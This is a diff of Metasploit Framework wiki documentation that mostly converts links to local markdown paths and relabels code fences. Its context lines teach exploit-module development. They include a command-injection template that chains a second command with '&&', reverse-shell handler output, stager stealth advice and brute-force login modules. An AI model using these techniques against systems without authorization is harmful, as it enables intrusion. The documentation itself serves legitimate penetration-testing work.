-Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [download the Metasploit nightly installers](https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers). This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.
+Welcome to Metasploit-land. Are you a Metasploit user who wants to get started or get better at hacking stuff (that you have permission to hack)? The quickest way to get started is to [[download the Metasploit nightly installers|./Nightly-Installers.md]]. This will give you access to both the free, open-source Metasploit Framework and a free trial of Metasploit Pro.

 If you're using [Kali Linux](https://kali.org/), Metasploit is already pre-installed. See the [Kali documentation](https://kali.org/docs/tools/starting-metasploit-framework-in-kali/) for how to get started using Metasploit in Kali Linux.

-Are you anxious to get your [Metasploit Development Environment](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].
+Are you anxious to get your [[Metasploit Development Environment|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] set up so you can start [[Landing Pull Requests]] and contributing excellent exploit code? If so, you're in the right place. If you're an exploit developer, you will want to review our [[Guidelines for Accepting Modules and Enhancements]] to find out what we expect when we see pull requests for new Metasploit modules. No idea what you should start working on? Check out the guidelines for [[contributing to Metasploit]], and dive into [[Setting Up a Metasploit Development Environment]].

 # Getting Started #

@@ -7,7 +7,7 @@ An updated list of the application timeline can be found at https://developers.g

 ## Important Dates

- GSoC Applications Open: April 4th at 1800 UTC 
+- GSoC Applications Open: April 4th at 1800 UTC
 - GSoC Applications Close: April 19th at 1800 UTC for 2022 GSoC applications. **No late submissions will be accepted, period.**
 - Accepted applications announced: May 20th at 1800 UTC
 - Programming Starts: June 13th.
@@ -19,14 +19,14 @@ An updated list of the application timeline can be found at https://developers.g
 You can find the current list of GSoC ideas at [[GSoC-2022-Project-Ideas]]. Please see the note at the bottom of this page if you are interested in submitting your own idea, as this will require approval.

 # Getting started
-Students interesting in GSoC, can start by reading Google's official guides.  
+Students interesting in GSoC, can start by reading Google's official guides.
 <https://developers.google.com/open-source/gsoc/help/student-advice>

 Review all of the [student guide](https://google.github.io/gsocguides/student/) and carefully read the [proposal writing section](https://google.github.io/gsocguides/student/writing-a-proposal.html).

 A listed `idea` is a seed for GSoC students to expand on and propose how to design and implement a solution.  You can start by investigating the code base and how existing users interaction with `msfconsole` functionality. Think through scenarios on how a user might want to interact with the proposed idea.

-A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [here](https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit#framework-bugs-and-features).
+A place to get started with contributing to Metasploit is [here](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and expanded on [[here|./Contributing-to-Metasploit.md]].

 GSoC mentors tend to look for those items that have a chance of making development and usage easier or improving the overall performance of a certain area, however by starting with understanding the most common contribution pattern you can get familiar with the codebase and also the mindset of users. This will help you in creating a proposal with the end user in mind.

@@ -50,14 +50,14 @@ A brief description of what you would like to work on. See [[GSoC-2022-Project-I

 ## Skillz

-What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well. 
+What programming languages are you familiar with, in order of proficiency? Most of Metasploit is written in Ruby; for any project you will most likely need at least a passing knowledge of it. If you want to work on Meterpreter or Mettle, C will be necessary as well.

 What other projects have you worked on before?


 ## Your project

-Fill in the details. What exactly do you want to accomplish? 
+Fill in the details. What exactly do you want to accomplish?

 # Past Submissions
 If you are interested in looking at past accepted submissions and projects, you can find them at https://summerofcode.withgoogle.com/archive, and clicking on any year from 2017 onwards (with the exception of 2019 as Metasploit did not participate this year). Then click on the `Security` tag, and search for `Metasploit`. Scroll down to the bottom and you will see past successful applications and the associated code for each successful submission. Submissions from 2020 onwards also include copies of the proposal that was sent in by the accepted contributor.
@@ -1,16 +1,16 @@
-The [HttpClient mixin](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.
+The [HttpClient mixin](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient) can be included with an exploit module in order to facilitate easier HTTP communications with a target machine.

 ## There are mainly two common methods you will see:

-* **[send\_request\_raw](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`.  If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
- 
+* **[send\_request\_raw](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_raw-instance_method)** - You use this to send a raw HTTP request. Usually, you will want this method if you need something that violates the specification; in most other cases, you should prefer `send_request_cgi`.  If you wish to learn about how this method works, look at the documentation for [`Rex::Proto::Http::Client#request_raw`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_raw-instance_method).
+
 Here's a basic example of how to use `send_request_raw`:

 ```ruby
 	send_request_raw({'uri'=>'/index.php'})
 ```

-* **[send\_request\_cgi](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this.  If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://rapid7.github.io/metasploit-framework/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).
+* **[send\_request\_cgi](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#send_request_cgi-instance_method)** - You use this to send a more CGI-compatible HTTP request. If your request contains a query string (or POST data), then you should use this.  If you wish to learn about how this method works, check out [`Rex::Proto::Http::Client#request_cgi`](https://docs.metasploit.com/api/Rex/Proto/Http/Client.html#request_cgi-instance_method).



@@ -31,7 +31,7 @@ send_request_cgi({

 ## Cookies & CookieJars

-Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's  `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class. 
+Part of send\_request\_cgi functionality is the ability to collect, edit, and send cookies via the HttpClient's  `cookie_jar` variable, an instance of the [HttpCookieJar](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie_jar.rb) class.

 A HttpCookieJar is a collection of [HttpCookie](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http/http_cookie.rb). The Jar can be populated manually with it's `add` method, or automatically via the `keep_cookies` option that can be passed to [send\_request\_cgi](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/lib/msf/core/exploit/remote/http_client.rb#L385).

@@ -59,7 +59,7 @@ res = @http_client.send_request_cgi({
  }
 })
 ```
-The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests. 
+The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.

 ### `cookie` option
 Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
@@ -136,7 +136,7 @@ register_options(
 )
 ```

-**2** - Load your TARGETURI with [`target_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:
+**2** - Load your TARGETURI with [`target_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#target_uri-instance_method), that way the URI input validation will kick in, and then you get a real `URI` object:

 In this example, we'll just load the path:

@@ -144,7 +144,7 @@ In this example, we'll just load the path:
 uri = target_uri.path
 ```

-**3** - When you want to join another URI, always use [`normalize_uri`](https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):
+**3** - When you want to join another URI, always use [`normalize_uri`](https://docs.metasploit.com/api/Msf/Exploit/Remote/HttpClient.html#normalize_uri-instance_method):

 Example:

@@ -38,7 +38,7 @@ register_options(

 ### Fixed filename

-Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [msftidy](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). Instead, here's how it's done properly:
+Occasionally, you might not want your user to change the filename at all. A lazy trick to do that is by modifying the ```FILENAME``` datastore option at runtime, but this is very much not recommended. In fact, if you do this, you will not pass [[msftidy|./Guidelines-for-Accepting-Modules-and-Enhancements.md]]. Instead, here's how it's done properly:

 1 - Deregister the ```FILENAME``` option

@@ -35,7 +35,7 @@ DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth'

 When the user loads that module, they should see a warning like this:

-```
+```msf
 msf > use exploit/windows/misc/test 

 [!] ************************************************************************
@@ -77,4 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote
  end

 end
-```
+```
@@ -2,7 +2,7 @@ This is an update of the original blog post about how to get Oracle support work

 Due to licensing issues, we cannot ship Oracle's proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module:

-```
+```msf
 msf auxiliary(oracle_login) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
@@ -11,7 +11,7 @@ msf auxiliary(oracle_login) > run
 msf auxiliary(oracle_login) > run
 ```
 or
-```
+```msf
 msf5 auxiliary(scanner/oracle/oracle_hashdump) > run

 [-] Failed to load the OCI library: cannot load such file -- oci8
@@ -159,4 +159,4 @@ install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/
 [...]
 <--- ext
 root@kali:~/ruby-oci8-ruby-oci8-2.2.7#
-```
+```
@@ -2,4 +2,4 @@

 I tricked you. We don't let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how.

-[You should try writing post modules instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module).
+[[You should try writing post modules instead|./How-to-get-started-with-writing-a-post-module.md]].
@@ -32,7 +32,7 @@ So you know how in Lord of the Rings, people are totally obsessed with the One R

 You can use the ```session``` method to access the session object, or its alias ```client```. The best way to interact with one is via irb, here's an example of how:

-```
+```msf
 msf exploit(handler) > run

 [*] Started reverse handler on 192.168.1.64:4444 
@@ -15,7 +15,7 @@ msf > irb
 By default, all the log errors are on level 0 - the least informative level. But of course, you can change this by setting the datastore option, like this:


-```
+```msf
 msf > setg LogLevel 3
 LogLevel => 3
 msf >
@@ -1,9 +1,9 @@
 **Note: This documentation may need to be vetted.**

 # How to send an HTTP request using Rex::Proto::Http::Client
-The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [Msf::Exploit::Remote::HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient) mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.
+The Rex library (Ruby Extension Library) is the most fundamental piece of the Metasploit Framework architecture. Modules normally do not interact with Rex directly, instead they depend on the framework core and its mixins for better code sharing. If you are a Metasploit module developer, the [lib/msf/core](https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core) directory should be more than enough for most of your needs. If you are writing a module that speaks HTTP, then the [[Msf::Exploit::Remote::HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]] mixin (which is found in [lib/msf/core/exploit/http/client](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/client.rb)) is most likely the one you want.

-However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners). If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).
+However, in some scenarios, you actually can't use the HttpClient mixin. The most common is actually when writing a form-based login module using the [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]]. If you find yourself in that situation, use [Rex::Proto::Http::Client](https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client.rb).

 ## Initializing Rex::Proto::Http::Client

@@ -1,5 +1,5 @@
 # How to use Msf::Auxiliary::AuthBrute to write a bruteforcer
-The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [LoginScanner API](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners) instead. However, some of the datastore options are still needed, so let's go over them right quick.
+The ```Msf::Auxiliary::AuthBrute``` mixin should no longer be used to write a login module, you should try our [[LoginScanner API|./Creating-Metasploit-Framework-LoginScanners.md]] instead. However, some of the datastore options are still needed, so let's go over them right quick.

 ### Regular options

@@ -53,6 +53,6 @@ Check out the other advanced options in the API documentation below.

 ### References

- <https://rapid7.github.io/metasploit-framework/api/Msf/Exploit/Powershell.html>
+- <https://docs.metasploit.com/api/Msf/Exploit/Powershell.html>
 - <https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/powershell.rb>
 - <https://github.com/rapid7/metasploit-framework/blob/master/data/exploits/powershell/powerdump.ps1>
@@ -6,7 +6,7 @@ In this documentation, understand that we require you no exploit development kno

 Each Metasploit module comes with some metadata that explains what it's about, and to see that you must load it first. An example:

-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 ```

@@ -24,7 +24,7 @@ This may sound surprising, but sometimes we get asked questions that are already

 You can use the info command to see the module's description:

-```
+```msf
 msf exploit(ms08_067_netapi) > info
 ```

@@ -36,13 +36,13 @@ If the exploit supports automatic targeting, it is always the first item on the

 The "show options" command will tell you which target is selected. For example:

-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```

 The "show targets" command will give you a list of targets supported:

-```
+```msf
 msf exploit(ms08_067_netapi) > show targets
 ```

@@ -50,13 +50,13 @@ msf exploit(ms08_067_netapi) > show targets

 All Metasploit modules come with most datastore options pre-configured. However, they may not be suitable for the particular setup you're testing. To do a quick double-check, usually the "show options" command is enough:

-```
+```msf
 msf exploit(ms08_067_netapi) > show options
 ```

 However, "show options" only shows you all the basic options. It does not show you the evasive or advanced options (try "show evasion" and "show advanced"), the command you should use that shows you all the datastore options is actually the "set" command:

-```
+```msf
 msf exploit(ms08_067_netapi) > set
 ```

@@ -158,7 +158,7 @@ Now let's modify the `execute_command` method and get code execution against the
 127.0.0.1+%26%26+[Malicious commands]
 ```

-We do that in `execute_command` using [HttpClient](https://github.com/rapid7/metasploit-framework/wiki/How-to-Send-an-HTTP-Request-Using-HTTPClient). Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:
+We do that in `execute_command` using [[HttpClient|./How-to-Send-an-HTTP-Request-Using-HttpClient.md]]. Notice there is actually some bad character filtering involved to get the exploit working correctly, which is expected:

 ```ruby
 def filter_bad_chars(cmd)
@@ -187,10 +187,10 @@ end
 And let's run that, we should have a shell:


-```
+```msf
 msf exploit(cmdstager_demo) > run

-[*] Started reverse TCP handler on 10.6.0.92:4444 
+[*] Started reverse TCP handler on 10.6.0.92:4444
 [*] Exploiting...
 [*] Transmitting intermediate stager for over-sized stage...(105 bytes)
 [*] Sending stage (1495599 bytes) to 10.6.0.92
@@ -223,7 +223,7 @@ Available flavors:

 The [VBS command stager](https://github.com/rapid7/rex-exploitation/blob/master/lib/rex/exploitation/cmdstager/vbs.rb) is for Windows. What this does is it encodes our payload with Base64, save it on the target machine, also writes a [VBS script](https://github.com/rapid7/rex-exploitation/blob/master/data/exploits/cmdstager/vbs_b64) using the echo command, and then lets the VBS script to decode the Base64 payload, and execute it.

-If you are exploiting Windows that supports Powershell, then you might want to [consider using that instead](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-Powershell-in-an-exploit) of the VBS stager, because Powershell tends to be more stealthy.
+If you are exploiting Windows that supports Powershell, then you might want to [[consider using that instead|./How-to-use-Powershell-in-an-exploit.md]] of the VBS stager, because Powershell tends to be more stealthy.

 To use the VBS stager, either specify your CmdStagerFlavor in the metadata:

@@ -21,7 +21,7 @@ option, which can be set by using the `setg` command. Module-level means only th
 remembers that datastore option, no other components will know about it. You are setting a module-level option if you
 load a module first, and then use the `set` command, like the following:

-```
+```msf
 msf > use exploit/windows/smb/ms08_067_netapi
 msf exploit(ms08_067_netapi) > set rhost 10.0.1.3
 rhost => 10.0.1.3
@@ -27,13 +27,14 @@ OPTIONS:
    -c        Clear the contents of the favorite modules file
    -d        Delete module(s) or the current active module from the favorite modules file
    -h        Help banner
+    -l        Print the list of favorite modules (alias for `show favorites`)
 ```



 The second method of adding favorites allows adding multiple modules at once:

-```shell
+```msf
 msf6 > favorite exploit/multi/handler exploit/windows/smb/psexec
 [+] Added exploit/multi/handler to the favorite modules file
 [+] Added exploit/windows/smb/psexec to the favorite modules file
@@ -72,7 +73,7 @@ msf6 > favorite -d exploit/multi/handler exploit/windows/smb/psexec

 #### Clearing the favorites list

-```shell
+```msf
 msf6 > show favorites

 Favorites
@@ -89,3 +90,18 @@ msf6 > show favorites
 [!] The favorite modules file is empty
 ```

+### Printing the list of favorite modules
+
+The list of favorite modules can be printed by supplying the `-l` flag. This is an alias for the `show favorites` and `favorites` commands.
+
+```shell
+msf6 > favorite -l
+
+Favorites
+=========
+
+   #  Name                        Disclosure Date  Rank    Check  Description
+   -  ----                        ---------------  ----    -----  -----------
+   0  exploit/multi/handler                        manual  No     Generic Payload Handler
+   1  exploit/windows/smb/psexec  1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution
+```
@@ -351,7 +351,7 @@ end

 The module will start the http server and print the repo to clone

-```
+```msf
 msf6 > use exploit/multi/http/git_clone_test
 [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
 msf6 exploit(multi/http/git_clone_test) > set srvport 9999
@@ -23,7 +23,7 @@ When the mixin is included, notice there will be the following datastore options
 * **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
 * **TCP::send_delay** - Evasive option. Delays inserted before every send.

-If you wish to learn how to change the default value of a datastore option, please read "[Changing the default value for a datastore option](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#changing-the-default-value-for-a-datastore-option)"
+If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"

 ## Make a connection

@@ -1,6 +1,6 @@
 This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs.

-Before we begin, it's probably a good idea to read [Creating Metasploit Framework LoginScanners](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners), which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
+Before we begin, it's probably a good idea to read [[Creating Metasploit Framework LoginScanners|./Creating-Metasploit-Framework-LoginScanners.md]], which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.

 ## Step 1: Set up your target environment

@@ -382,7 +382,7 @@ And finally, make sure your module actually works.

 Test for a successful login:

-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run

 [+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword'
@@ -393,7 +393,7 @@ msf auxiliary(symantec_web_gateway_login) >

 Test for a failed login:

-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run

 [-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass'
@@ -1,8 +1,8 @@
 The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are:

-* **[Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer)** - The most basic form of a HTTP server.
+* **[[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]]** - The most basic form of a HTTP server.
 * **[Msf::Exploit::Remote::HttpServer::HTML](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_server/html.rb)** - which provides Javascript functions that the module can use when crafting HTML contents.
-* **[Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
+* **[[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.

 ### The Automatic Exploitation Procedure

@@ -139,7 +139,7 @@ def on_request_exploit(cli, request, target_info)
 	</html>
 	|
 	send_exploit_html(cli, html)
-end 
+end
 ```

 [ERB](http://ruby-doc.org/stdlib-2.1.3/libdoc/erb/rdoc/ERB.html) is a new way to write Metasploit browser exploits. If you've written one or two web applications, this is no stranger to you. When you're using the BrowserExploitServer mixin to write an exploit, what really happens is you're writing a rails template. Here's an example of using of this feature:
@@ -296,7 +296,7 @@ If your BES-based exploit does not want obfuscation at all, always make sure you
 deregister_options('JsObfuscate')
 ```

-To learn more about Metasploit's JavaScript obfuscation capabilities, please read [How to obfuscate JavaScript in Metasploit](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit).
+To learn more about Metasploit's JavaScript obfuscation capabilities, please read [[How to obfuscate JavaScript in Metasploit|./How-to-obfuscate-JavaScript-in-Metasploit.md]].


 ### Related Articles:
@@ -1,4 +1,4 @@
-The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer), Msf::Exploit::Remote::HttpServer::HTML and [Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer). This writeup covers the HttpServer mixin.
+The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]], Msf::Exploit::Remote::HttpServer::HTML and [[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]. This writeup covers the HttpServer mixin.

 The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have a "on_request_uri" method, which is a callback triggered when the HTTP server receives a HTTP request from the browser. An example of setting up "on_request_uri":

@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'sinn3r' ],
-      'References'     => 
+      'References'     =>
        [
          [ 'URL', 'http://metasploit.com' ]
        ],
@@ -82,7 +82,7 @@ In case you're wondering why the web server must terminate after a period of tim

 The output for the above example should look something like this:

-```
+```msf
 msf exploit(test) > run
 [*] Exploit running as background job.

@@ -30,7 +30,7 @@ The exploit should say what requirements are not met. The requirements are expla

 If you'd like to check the comparisons, simply set VERBOSE to true. The following is an example:

-```
+```msf
 msf exploit(ms13_022_silverlight_script_object) > set VERBOSE true
 VERBOSE => true
 msf exploit(ms13_022_silverlight_script_object) > run
@@ -1,13 +1,13 @@
 **This page is meant for Committers. If you are unsure whether you are a committer, you are not.**

-Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [Dev environment setup](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
+Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [[Dev environment setup|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.

 # The short story

- - Configure your git environment as described [here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#keeping-in-sync).
+ - Configure your git environment as described [[here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]].
 - Add the `fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*` line to your `.git/config`.
 - Add your signing key `git config --global user.signingkey`
-     - Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below: 
+     - Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:

        ```
        pub   rsa4096 2020-04-07 [SC]
@@ -16,7 +16,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
        sub   rsa4096 2020-04-07 [E]
        ```
     - Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute:
- 
+
       ```
       git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83
       ```
@@ -30,13 +30,13 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques

    Fixes #1024, also see #999.
    ````
-    - The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a 
+    - The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
      nice assurance that you're really you.
-    - The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if 
+    - The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
      the merge would normally be resolved as a fast forwards. This ensure that all changes have a
      commit associated with them.
-    - The `--edit` flag will drop you into your default editor (normally vim), and will allow you 
-      to edit the commit message so that it conforms to Metasploit standards, rather than sticking 
+    - The `--edit` flag will drop you into your default editor (normally vim), and will allow you
+      to edit the commit message so that it conforms to Metasploit standards, rather than sticking
      with git's pre-generated commit message which does not.
  - Note that the `--no-ff` flag should be used both for PRs that go back to a contributor's branch as well as PRs that land in Metasploit's master branch.
 - If you're making changes (often the case), merge to a landing branch, then merge **that** branch to upstream/master with the `-S --no-ff --edit` options.
@@ -46,7 +46,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
 Check out [this gist](https://gist.github.com/todb-r7/3fbee1a9e7b36d82ca55) that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers.
 # Fork and clone

-First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [as described here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-ssh), but the https method will work, too.
+First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [[as described here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]], but the https method will work, too.

 Once this is done, you will have a remote repository called "origin," which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7's fork. Now, we're going to add an "upstream" repository to talk to the Rapid7 repository.

@@ -135,7 +135,7 @@ In this particular case with PR #1217, I did want to send some changes back to t
 Here's an example with #6954 (your workflow may vary):

 ```
-$ git checkout upstream/master 
+$ git checkout upstream/master
 Note: checking out 'upstream/master'.

 You are in 'detached HEAD' state. You can look around, make experimental
@@ -258,7 +258,7 @@ c = commit -S --edit
 m = merge -S --no-ff --edit
 ````

-People with commit rights to rapid7/metasploit-framework will have their [keys listed here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
+People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].

 # Post-Merge

@@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.

 # Questions and Corrections

-Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com. 
+Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
@@ -1,6 +1,6 @@
